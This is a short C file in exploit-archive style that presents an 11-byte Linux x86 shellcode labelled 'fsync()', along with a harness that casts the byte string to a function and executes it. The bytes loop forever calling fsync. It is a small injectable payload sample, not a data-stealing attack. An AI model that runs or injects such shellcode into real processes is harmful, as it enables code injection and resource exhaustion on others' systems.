/* +========================================================================================================= | # Exploit Title : linux/x86 fsync() - 11 bytes | # Exploit Author : Febriyanto Nugroho | # Tested on : Linux Debian 5.0.5 | -------------------------------------------------------------------------------------------------------- | # Thank's to : xevil, CyberKaze, X-Cisadane, Deyubi-Cyber, Deflectoz, justinisal, Bomber88, | ame, d0ey_Grunch, bh0ttu, Revil, and all Bogor Hackers Community member and crew ... +========================================================================================================= */ #include <stdio.h> char *shellcode = "\x31\xc0\x50\x89\xe3" "\xb0\x76\xcd\x80\xeb" "\xf5"; int main(void) { ((void (*)(void)) shellcode)(); return 0; }